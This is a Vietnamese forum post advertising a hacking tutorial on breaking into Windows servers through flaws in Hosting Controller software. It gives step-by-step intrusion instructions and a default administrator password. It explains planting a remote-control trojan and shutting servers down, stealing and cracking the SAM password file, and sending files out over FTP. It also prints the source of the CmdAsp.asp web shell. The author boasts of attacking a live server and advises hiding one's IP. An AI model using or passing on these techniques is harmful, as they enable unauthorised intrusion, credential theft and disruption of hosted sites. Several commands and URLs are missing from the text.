beheo_hy4ever
New Member
Download miễn phí Các bước Hack Server
Hack Server NT qua bug Hosting Controller :
Lỗi HC là lỗi của phần mềm Hosting Controller dùng đểquản lý server cung cấp domain
và hosting cho khách hàng thường được chạy dưới Win2000/NT. Tôi sẽHack qua lỗi HC
và sẽví dụvới 1 server chưa fix đó là server chứa 38 site mà đã được Hacker Forum
Hacked vào tháng trước .
+ Lỗi HC cho bạn thực hiện 1 dòng lệnh để đọc ổcứng ( C; D; E ) thậm chí cả ổA
của server qua 1 site hay trực tiếp bằng ID của server. Lỗi HC thực chất là bịlỗi của 4
file nằm trong phần mềm là : statsbrowse.asp ; servubrowse.asp ; browsedisk.asp ;
browsewebalizerexe.asp ; sqlbrowse.asp
Để tải bản Đầy Đủ của tài liệu, xin Trả lời bài viết này, Mods sẽ gửi Link download cho bạn sớm nhất qua hòm tin nhắn.
Ai cần download tài liệu gì mà không tìm thấy ở đây, thì đăng yêu cầu down tại đây nhé:
Nhận download tài liệu miễn phí
Tóm tắt nội dung tài liệu:
load ; OK !Bây giờ thì bạn có thể nghịch thoải mái; Bạn có thể cho toàn bộ site die trong
1 giờ cũng được hi hi ..
Còn 1 vài lỗi nữa của HC, trong đó có lỗi cho phép bạn có khả năng khởi tạo cho mình 1
hosting trong server nhờ dòng lệnh sau :
Cũng như trên, Victim là Server bị lỗi HC mà bạn muốn Hack. Ví dụ đó là Website
Mình đã khởi tạo cái này, các bạn vô xem :
Lỗi này cho phép cho đăng ký free Domain. Bạn hãy đăng ngay 1 Domain cho mình rồi
vào để Login với với Account vừa đăng ký. Sau khi
Login, bạn click vào mục Directories trên menu rồi vào Domain của bạn. Sau đó, bạn hãy
upload trang web của mình lên (nơi upload ở dưới cùng) và nhớ là tên trang web đừng
dài, rồi click vào logout (ở bên phải trên cùng). Vậy là ta đã đi được nửa chặng đường
Tiếp theo bạn hãy vào :
Bạn hãy thay chữ "username" bằng username lúc đầu bạn đăng ký Domain và thay chữ
www.yourdomain.com bằng địa chỉ Domain mà bạn đăng ký và enter. Ví dụ tui đăng ký
1 Domain tên với username là ncviet ở Website
thì tui sẽ gõ :
Đây là phần Import của Website. Nó sẽ hiện ra 4 khung đường dẫn. Bây giờ bạn hãy tìm
trang web của mình ở khung thứ nhất bên dưới và click vào nó rồi nhấn nút "import".
Bây giờ nó đã copy trang Web của bạn vào khung thứ hai bên dưới. Ok, vậy là bạn đã
Hack xong rồi đó. ví dụ bạn upload file cl.htm thì đường dẫn Web của bạn sẽ là :
Chú ý : sẽ được thay bằng Website bị lỗi hc. Và có thể trong quá
trình hack, server sẽ bắt giữ IP của bạn vì vậy bạn nên ngụy trang cho thật khéo .
Bạn có thể tìm rất nhiều server hiện vẫn còn đang bị lỗi này bằng cách và
rồi nhập từ khoá "Hosting Controller" cho nó Search.
Tiếp theo là một lỗi slash dot dot của HC cho phép ta thấy được đường dẫn các ổ đĩa và
các thư mục của server và ta có thể lợi dụng nó để add (thêm vào) một đường dẫn DSN
để chỉ tới một địa chỉ mới. Để khai thác lỗi này bạn dùng đoạn code sau :
Cái thứ hai là chúng ta có thể thay đổi hoàn toàn hay add vào thư mục admin và thi hành
những gì chúng ta muốn. Để khai thác lỗi này chỉ cần đưa vào đoạn code sau :
Bạn có thể nắm quyền điều khiển toàn bộ các file trong thư mục (và có thể là cả C:\) và
thay đổi tùy thích..
Và lỗi cuối cùng là default password, nếu admin không xoá hay thay đổi user có tên là
AdvWebadmin (user default) thì điều này rất nguy hiểm, bởi vì ta có thể nắm quyền điều
khiển hoàn toàn server (hay 1 phần) thông qua password default cho user này là
"advcomm500349", sau đó thì hack chỉ là việc dễ dàng.
Tiện thể mình cũng chỉ thêm cho các bạn cách cài trojan hay 1 chương trình DoS
(Denial of Service) vào server mà ban đã vào được để phục vụ cho công việc Hack cho
mình sau này. Thường thì khi Hack qua lỗi HC bạn rất khó có thể cài thẳng chương trình
vào ổ C:/ như lỗi IIS được. Nhưng chúng ta vẫn có thể cài 1 chương trình nhờ chúng ta
setup qua site nằm trong server. Bạn hãy Upload 1 con trojan vào 1 site mà chúng ta
muốn (Cách Upload như trên đã nói). Sau đây tui sẽ cài 1 con reaccserver có chức năng
khi cài vào 1 server chúng ta có thể điều khiển server bằng máy tính ở nhà mình. tui
upload file reaccserver.exe lên site .
Bây giờ muốn cài đặt trojan này vào trong server bạn hãy đánh dòng sau :
Bạn tự hỏi làm sao mà nó có thể cài vào được server mà không qua thông báo ở máy chứ.
Đúng, thường thì các phần mềm quản lý Hosting sẽ thông báo ở máy chủ nhưng thường
thì người quản lý server sẽ bỏ qua chế độ này khi cài đặt HC Khi bạn đánh dòng trên nếu
thành công thì ở IE sẽ thông báo "server setup file full". Nếu không thành công nó sẽ báo
"Can't not Found". Lúc này bạn hãy đánh lại :
Đảm bảo sẽ OK
Chú ý : khi setup file đó thì PC của bạn cũng sẽ bị cài đặt chương trình đó. Bạn
hãy gỡ nó ra . Vừa rồi mình đã cài đặt trojan reaccserver rồi. Bây giờ bạn hãy dùng phần
còn lại của chương trình là file cp.exe. Chúng ta có thể Shutdown hay Restart server kia.
Thường thì server sẽ mất ít nhất 3 phút để khởi động lài .
Bây giờ mình cũng nói thêm về lỗi 1 số Website ở các server cài đặt HC là thường để các
file upload.asp nằm ở trong các thư mục của Website. Vì vậy mặc dù lỗi HC có bị fix thì
chúng ta cũng Hack như thường .
Đây là ví dụ : Bạn
thấy chưa ! Mình có thể upload bất cứ file nào mà mình muốn . Bây giờ mình thử tìm cấu
trúc thường c1o của 1 website cài HC nha. Bạn hãy vào đây :
để xem toàn bộ server với các lệnh dir C:\ ; dir D:\ ;
dir E:\ và đọc file bằng lệnh type C:\..[đườngdẫn].. ----> Chú ý : lệnh này có thể đọc được
bất cứ file nào .
Bạn thử tìm trong đó mà xem cũng có nhiều lắm .
À khi các bạn vào được server, bạn nên cài 1 file ASP để đọc ổ cứng cho đễ. Đây
là cấu trúc của file cmd.asp :
-----------------------------------------------------------------------
<%
' --------------------o0o--------------------
' File: CmdAsp.asp
' Author: Maceo
' Release: 2000-12-01
' OS: Windows 2000, 4.0 NT
' -------------------------------------------
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
On Error Resume Next
' -- create the COM objects that we will be using -- '
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
' -- check for a command that we have posted -- '
szCMD = Request.Form(".CMD")
If (szCMD "") Then
' -- Use a poor mans pipe ... a temp file -- '
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
" method="POST">
-------------------------------------------------------------------------------------
NTDaddy có thể download ở đây: ntdaddy download
Ở một số server, không rõ lý do ta phải dùng kết hợp cả cmdasp và ntdaddy mới hiệu
quả.
Để khai thác, có 2 nguồn thông tin cực kì quan trọng mà ta cần quan tâm trước tiên, đó là
database của HC và file sam._, nơi chứa tất cả các thông tin về các host trên server.
File sam._ thật ra chỉ là bản backup, có thể không đầy đủ, thường được lưu ở winnt\repair.
Bản sam đầy đủ có ở winnt\system32\config, như bị lock, rất khó lấy. Sau khi lấy được
sam._, các bạn dùng l0pht hay Lc3 (download ở hay rất nhiều
trên net) để Cr-ack.
Còn database của các host, thường lưu trữ ở thư mục cài đặt HC, vd như c:\program
files\advanced communitations\NT web hosting\...., là một file access.
Cách download các file như thế nào!? có vài cách cho bạn, nếu bạn biết được vị trí lưu
trữ data các host trên server (vd như dạng d:\users\www\democoun\www, địa chỉ này
thực chất khi browse trên browser sẽ là chẳng hạn - đây chỉ
là vd, các bạn phải tự tìm hiểu folder cụ thể, điều này rất quan trọng), bạn có thể dùng
lệnh copy, chép thẳng các file này vào thư mục trên, sau đó download thẳng xuống từ
browser, như www.democoun.com/sam._ .
Cách khác là dùng ftp để send file mình muốn đến 1 địa chỉ ftp mà mình biết, bằng gõ
lệnh trong cmdasp.asp hay nddaddy.asp (Cách này tui được Kha cung cấp thông tin). Tuy
nhiên, ta không thể nhập và chạy từng lệnh tương tác ftp dùng các trình này được, bạn phải
tạo 1 file text có chứa danh sách các lệnh và yêu cầu ftp chạy các lệnh đó. Cách tạo 1 filte
text, ta sẽ dùng lệnh ec...